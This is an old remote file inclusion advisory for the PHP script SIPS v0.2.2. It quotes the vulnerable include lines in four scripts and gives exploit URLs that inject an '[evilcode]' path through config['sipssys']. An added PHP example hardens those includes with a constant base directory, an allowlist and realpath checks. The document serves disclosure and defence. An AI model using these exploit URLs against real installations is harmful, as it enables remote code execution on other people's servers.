
SIPS v0.2.2 Remote File Inclusion Vulnerability



Hi Dear,
Please publish this bug.
Thank you
======================================================================

  [o] SIPS v0.2.2 Remote File Inclusion Vulnerability

      Software : SIPS v0.2.2
      Vendor   : http://www.phpscripts-fr.net/scripts/hosted/sips022.zip
      Author   : Cru3l.b0y
      Home     : WwW.DeltaHacking.Net

======================================================================

  [o] Vulnerable file

      search.php

          include $config["sipssys"] ."/code/news.inc.php";

      readmore.php

          include $config["sipssys"] ."/code/news.inc.php";

      index.php

          include $config["sipssys"] ."/code/news.inc.php";
          include $config["sipssys"] ."/code/box.inc.php";

      search/submit.php

          include $config["sipssys"] ."/code/search.inc.php";

  [o] Exploit

      http://localhost/[path]/search.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/readmore.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/index.php?config["sipssys"]=[evilcode]
      http://localhost/[path]/search/submit.php?config["sipssys"]=[evilcode]
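
A hardened form of the include lines listed above, as an added example that is not part of the advisory or of the SIPS code. It assumes, as the URLs imply, that a request parameter can set $config["sipssys"] before the include runs; SIPS_SYS_DIR, sips_resolve() and the temp-directory layout are hypothetical names constructed for the demonstration.

```php
<?php
// Added example, not SIPS code. SIPS_SYS_DIR and sips_resolve() are hypothetical.
//
// Pattern quoted in the advisory (the include prefix is a variable):
//   include $config["sipssys"] ."/code/news.inc.php";
// Assumption: the scripts do not assign $config["sipssys"] themselves before
// this line, so a request parameter of the same name can supply it.

// Constructed layout for the demo: a temp directory standing in for the install.
$demo = sys_get_temp_dir() . '/sips_demo_' . getmypid();
@mkdir($demo . '/code', 0700, true);
file_put_contents($demo . '/code/news.inc.php', '<?php return "news loaded";');

// Hardened form: the base directory is a constant set in server-side code,
// so no request variable can replace it.
define('SIPS_SYS_DIR', $demo);

function sips_resolve(string $relative): string
{
    // Only the include files named in the advisory are accepted.
    $allowed = ['code/news.inc.php', 'code/box.inc.php', 'code/search.inc.php'];
    if (!in_array($relative, $allowed, true)) {
        throw new InvalidArgumentException("not allowlisted: $relative");
    }
    $base = realpath(SIPS_SYS_DIR);
    $path = realpath(SIPS_SYS_DIR . '/' . $relative);
    // realpath() resolves ../ and symlinks and returns false unless the result
    // is an existing local path, so a URL or a missing file stops here.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException("outside system directory: $relative");
    }
    return $path;
}

// Constructed request input: whatever arrives as config[sipssys] is never read.
$_GET['config'] = ['sipssys' => 'http://example.invalid/x'];
$out = include sips_resolve('code/news.inc.php');
echo $out, "\n";

// A name that is not on the allowlist is refused before any path is built.
try {
    sips_resolve('../code/other.inc.php');
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Independently of the code change, allow_url_include = Off in php.ini (the default since PHP 5.2) stops include from fetching a URL, and register_globals no longer exists from PHP 5.4 on.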